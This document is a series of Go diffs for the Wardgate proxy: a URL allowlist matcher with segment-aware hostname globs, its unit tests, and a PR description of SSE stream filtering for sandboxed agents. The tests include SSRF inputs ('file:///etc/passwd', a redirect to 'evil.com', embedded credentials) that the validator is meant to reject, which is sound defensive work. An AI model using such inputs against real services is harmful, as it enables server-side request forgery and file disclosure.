-	// as a segment prefix (e.g., /v1 matches /v1/foo but not /v1-admin).
-	patternPath := strings.ReplaceAll(p.Path, "WILDCARD", "*")
+	patternPath := strings.ReplaceAll(p.Path, "DOUBLEWILD", "**")
+	patternPath = strings.ReplaceAll(patternPath, "SINGLEWILD", "*")
 	if patternPath != "" && patternPath != "/" {
 		if u.Path != patternPath && !strings.HasPrefix(u.Path, patternPath+"/") {
 			return false
@@ -79,4 +78,57 @@ func matchUpstreamPattern(u *url.URL, pattern string) bool {
 	}
 
 	return true
+}
+
+// matchHostname matches a hostname against a pattern where:
+//   - "*" matches exactly one dot-separated segment
+//   - "**" matches one or more dot-separated segments
+func matchHostname(pattern, host string) bool {
+	// Fast path: no wildcards, use path.Match for simple glob chars (e.g., ?)
+	if !strings.Contains(pattern, "*") {
+		matched, err := path.Match(pattern, host)
+		return err == nil && matched
+	}
+
+	patternParts := strings.Split(pattern, ".")
+	hostParts := strings.Split(host, ".")
+
+	return matchSegments(patternParts, hostParts)
+}
+
+// matchSegments recursively matches pattern segments against host segments.
+func matchSegments(pattern, host []string) bool {
+	for len(pattern) > 0 {
+		seg := pattern[0]
+
+		if seg == "**" {
+			// ** must match at least one segment
+			if len(host) == 0 {
+				return false
+			}
+			rest := pattern[1:]
+			// Try consuming 1..N host segments
+			for i := 1; i <= len(host); i++ {
+				if matchSegments(rest, host[i:]) {
+					return true
+				}
+			}
+			return false
+		}
+
+		if len(host) == 0 {
+			return false
+		}
+
+		// Single segment match: * matches one segment, otherwise literal/glob
+		matched, err := path.Match(seg, host[0])
+		if err != nil || !matched {
+			return false
+		}
+
+		pattern = pattern[1:]
+		host = host[1:]
+	}
+
+	return len(host) == 0
 }

--- a/internal/proxy/upstream.go
+++ b/internal/proxy/upstream.go
@@ -1,0 +1,82 @@
+package proxy
+
+import (
+	"net/url"
+	"path"
+	"strings"
+)
+
+// MatchUpstream checks if a target URL is allowed by any of the given patterns.
+// Patterns are glob-style with scheme (e.g., "https://*.googleapis.com").
+// Returns false for URLs with userinfo, non-HTTP schemes, or malformed input.
+func MatchUpstream(rawURL string, patterns []string) bool {
+	u, err := url.Parse(rawURL)
+	if err != nil {
+		return false
+	}
+
+	// Reject non-HTTP schemes
+	if u.Scheme != "http" && u.Scheme != "https" {
+		return false
+	}
+
+	// Reject userinfo (SSRF vector: http://user@internal-host)
+	if u.User != nil {
+		return false
+	}
+
+	// Reject URLs with query parameters or fragments (keep upstream clean)
+	if u.RawQuery != "" || u.Fragment != "" {
+		return false
+	}
+
+	// Must have a host
+	if u.Host == "" {
+		return false
+	}
+
+	// Match against each pattern
+	for _, pattern := range patterns {
+		if matchUpstreamPattern(u, pattern) {
+			return true
+		}
+	}
+
+	return false
+}
+
+// matchUpstreamPattern matches a parsed URL against a single pattern.
+// Pattern format: "https://*.example.com" or "https://api.example.com"
+func matchUpstreamPattern(u *url.URL, pattern string) bool {
+	// Replace * with WILDCARD so url.Parse doesn't treat globs as invalid path chars.
+	p, err := url.Parse(strings.ReplaceAll(pattern, "*", "WILDCARD"))
+	if err != nil {
+		return false
+	}
+
+	// Scheme must match exactly
+	patternScheme := strings.ReplaceAll(p.Scheme, "WILDCARD", "*")
+	if patternScheme != u.Scheme {
+		return false
+	}
+
+	// Match hostname using path.Match (glob matching where * matches any non-/ chars).
+	// Since hostnames contain no /, * matches across dots (e.g., *.example.com).
+	// Normalize to lowercase because DNS hostnames are case-insensitive.
+	patternHost := strings.ToLower(strings.ReplaceAll(p.Host, "WILDCARD", "*"))
+	matched, err := path.Match(patternHost, strings.ToLower(u.Host))
+	if err != nil || !matched {
+		return false
+	}
+
+	// If pattern has a path beyond "/", the URL path must match exactly or
+	// as a segment prefix (e.g., /v1 matches /v1/foo but not /v1-admin).
+	patternPath := strings.ReplaceAll(p.Path, "WILDCARD", "*")
+	if patternPath != "" && patternPath != "/" {
+		if u.Path != patternPath && !strings.HasPrefix(u.Path, patternPath+"/") {
+			return false
+		}
+	}
+
+	return true
+}

--- a/internal/proxy/upstream_test.go
+++ b/internal/proxy/upstream_test.go
@@ -1,0 +1,189 @@
+package proxy
+
+import "testing"
+
+func TestMatchUpstream_ExactMatch(t *testing.T) {
+	patterns := []string{"https://api.github.com"}
+
+	if !MatchUpstream("https://api.github.com", patterns) {
+		t.Error("expected exact match to succeed")
+	}
+	if !MatchUpstream("https://api.github.com/repos", patterns) {
+		t.Error("expected non-root path to be allowed (no path restriction in pattern)")
+	}
+}
+
+func TestMatchUpstream_GlobSubdomain(t *testing.T) {
+	patterns := []string{"https://*.googleapis.com"}
+
+	tests := []struct {
+		url  string
+		want bool
+	}{
+		{"https://storage.googleapis.com", true},
+		{"https://compute.googleapis.com", true},
+		{"https://googleapis.com", false},
+		{"https://evil.com.googleapis.com", true}, // single * matches one segment
+		{"http://storage.googleapis.com", false},  // scheme mismatch
+	}
+
+	for _, tt := range tests {
+		got := MatchUpstream(tt.url, patterns)
+		if got != tt.want {
+			t.Errorf("MatchUpstream(%q) = %v, want %v", tt.url, got, tt.want)
+		}
+	}
+}
+
+func TestMatchUpstream_SchemeMismatch(t *testing.T) {
+	patterns := []string{"https://api.example.com"}
+
+	if MatchUpstream("http://api.example.com", patterns) {
+		t.Error("http should not match https pattern")
+	}
+}
+
+func TestMatchUpstream_SSRFVectors(t *testing.T) {
+	patterns := []string{"https://*.example.com"}
+
+	tests := []struct {
+		name string
+		url  string
+	}{
+		{"userinfo", "https://admin:password@internal.example.com"},
+		{"query params", "https://api.example.com?redirect=http://evil.com"},
+		{"fragment", "https://api.example.com#something"},
+		{"non-http scheme", "ftp://api.example.com"},
+		{"javascript scheme", "javascript://api.example.com"},
+		{"file scheme", "file:///etc/passwd"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if MatchUpstream(tt.url, patterns) {
+				t.Errorf("expected SSRF vector %q to be rejected", tt.url)
+			}
+		})
+	}
+}
+
+func TestMatchUpstream_MalformedURLs(t *testing.T) {
+	patterns := []string{"https://*.example.com"}
+
+	tests := []struct {
+		name string
+		url  string
+	}{
+		{"empty string", ""},
+		{"no scheme", "api.example.com"},
+		{"no host", "https://"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if MatchUpstream(tt.url, patterns) {
+				t.Errorf("expected malformed URL %q to be rejected", tt.url)
+			}
+		})
+	}
+}
+
+func TestMatchUpstream_MultiplePatterns(t *testing.T) {
+	patterns := []string{
+		"https://api.github.com",
+		"https://uploads.github.com",
+	}
+
+	if !MatchUpstream("https://api.github.com", patterns) {
+		t.Error("expected first pattern to match")
+	}
+	if !MatchUpstream("https://uploads.github.com", patterns) {
+		t.Error("expected second pattern to match")
+	}
+	if MatchUpstream("https://gist.github.com", patterns) {
+		t.Error("expected non-matching URL to be rejected")
+	}
+}
+
+func TestMatchUpstream_NoPatterns(t *testing.T) {
+	if MatchUpstream("https://api.example.com", nil) {
+		t.Error("expected nil patterns to reject everything")
+	}
+	if MatchUpstream("https://api.example.com", []string{}) {
+		t.Error("expected empty patterns to reject everything")
+	}
+}
+
+func TestMatchUpstream_PathInPattern(t *testing.T) {
+	patterns := []string{"https://api.example.com/v1"}
+
+	if !MatchUpstream("https://api.example.com/v1", patterns) {
+		t.Error("expected path match")
+	}
+	if MatchUpstream("https://api.example.com/v2", patterns) {
+		t.Error("expected path mismatch to be rejected")
+	}
+}
+
+func TestMatchUpstream_CaseInsensitive(t *testing.T) {
+	patterns := []string{"https://api.example.com"}
+
+	tests := []struct {
+		url  string
+		want bool
+	}{
+		{"https://API.EXAMPLE.COM", true},
+		{"https://Api.Example.Com", true},
+		{"https://api.EXAMPLE.com/path", true},
+	}
+
+	for _, tt := range tests {
+		got := MatchUpstream(tt.url, patterns)
+		if got != tt.want {
+			t.Errorf("MatchUpstream(%q) = %v, want %v", tt.url, got, tt.want)
+		}
+	}
+}
+
+func TestMatchUpstream_PathSegmentBoundary(t *testing.T) {
+	patterns := []string{"https://api.example.com/v1"}
+
+	tests := []struct {
+		url  string
+		want bool
+	}{
+		{"https://api.example.com/v1", true},
+		{"https://api.example.com/v1/users", true},
+		{"https://api.example.com/v1-admin", false},
+		{"https://api.example.com/v1beta", false},
+		{"https://api.example.com/v10", false},
+	}
+
+	for _, tt := range tests {
+		got := MatchUpstream(tt.url, patterns)
+		if got != tt.want {
+			t.Errorf("MatchUpstream(%q) = %v, want %v", tt.url, got, tt.want)
+		}
+	}
+}
+
+func TestMatchUpstream_PortHandling(t *testing.T) {
+	patterns := []string{"https://api.example.com:8443"}
+
+	tests := []struct {
+		url  string
+		want bool
+	}{
+		{"https://api.example.com:8443", true},
+		{"https://api.example.com:8443/path", true},
+		{"https://api.example.com:443", false},
+		{"https://api.example.com", false},
+	}
+
+	for _, tt := range tests {
+		got := MatchUpstream(tt.url, patterns)
+		if got != tt.want {
+			t.Errorf("MatchUpstream(%q) = %v, want %v", tt.url, got, tt.want)
+		}
+	}
+}

--- a/internal/proxy/upstream_test.go
+++ b/internal/proxy/upstream_test.go
@@ -23,8 +23,32 @@ func TestMatchUpstream_GlobSubdomain(t *testing.T) {
 		{"https://storage.googleapis.com", true},
 		{"https://compute.googleapis.com", true},
 		{"https://googleapis.com", false},
-		{"https://evil.com.googleapis.com", true}, // single * matches one segment
-		{"http://storage.googleapis.com", false},  // scheme mismatch
+		{"https://evil.com.googleapis.com", false}, // * matches one segment only
+		{"http://storage.googleapis.com", false},   // scheme mismatch
+	}
+
+	for _, tt := range tests {
+		got := MatchUpstream(tt.url, patterns)
+		if got != tt.want {
+			t.Errorf("MatchUpstream(%q) = %v, want %v", tt.url, got, tt.want)
+		}
+	}
+}
+
+func TestMatchUpstream_DoubleStarSubdomain(t *testing.T) {
+	patterns := []string{"https://**.googleapis.com"}
+
+	tests := []struct {
+		url  string
+		want bool
+	}{
+		{"https://storage.googleapis.com", true},
+		{"https://compute.googleapis.com", true},
+		{"https://googleapis.com", false},                     // ** requires at least one segment
+		{"https://intended.com.googleapis.com", true},         // ** matches multiple segments
+		{"https://deep.nested.sub.googleapis.com", true},      // ** matches many segments
+		{"http://storage.googleapis.com", false},              // scheme mismatch
+		{"https://storage.googleapis.com/some/path", true},    // path allowed
 	}
 
 	for _, tt := range tests {


### PR DESCRIPTION
## Summary

- **SSE stream filtering**: Wardgate can now proxy Server-Sent Event streams (used by OpenAI, Anthropic, and other LLM APIs) while scanning each chunk in real-time for sensitive data. This means agents running inside sandboxed environments can stream LLM completions through Wardgate without ever touching the real API credentials, and any accidentally leaked secrets in the model output get redacted before reaching the agent.

- **Dynamic upstreams**: Instead of a fixed upstream URL, endpoints can declare `allowed_upstreams` glob patterns. The agent specifies the target per-request via `X-Wardgate-Upstream`. This is essential for platforms like Shopify (`https://{store}.myshopify.com/admin/api`), Atlassian (`https://{tenant}.atlassian.net`), or Salesforce (`https://{instance}.salesforce.com`) -- where the subdomain is customer-specific and not known at config time. A single Wardgate endpoint with `allowed_upstreams: ["https://*.myshopify.com"]` covers every store the user authorizes.

## Why this matters for sandboxed agents

AI agents running in isolated containers (conclaves) need to call external APIs but should never see real credentials. Before this change, Wardgate could proxy standard HTTP request/response pairs but couldn't handle streaming responses -- the dominant pattern for LLM APIs. Agents had to either bypass Wardgate for LLM calls (breaking the security model) or buffer the entire response (destroying the streaming UX).

Now an agent inside a sandbox can `streamText()` through Wardgate with the same latency as a direct connection, while Wardgate handles credential injection and output filtering transparently.

## Changes

- `internal/proxy/sse.go` -- SSE stream parser/filter with per-chunk scanning
- `internal/proxy/upstream.go` -- Dynamic upstream resolution and glob matching
- `internal/proxy/http.go` -- Integration of SSE detection and upstream routing
- `internal/config/config.go` -- `allowed_upstreams`, `sse_mode`, and `timeout` config fields
- `docs/config.md` -- Walkthrough: "How to Add an SSE Endpoint (OpenAI Example)"
- Full test coverage: `sse_test.go`, `upstream_test.go`, `http_test.go`, `config_test.go`, `e2e/sse_test.go`

## Test plan

- [x] Unit tests for SSE line parsing, redact/block actions, metadata passthrough
- [x] Unit tests for upstream glob matching, scheme enforcement, path boundaries
- [x] Integration tests for proxy with SSE content-type detection
- [x] Config validation tests for new fields
- [x] E2E test with mock SSE server
- [x] Manual verification: streamed OpenAI chat completion through Wardgate (confirmed working)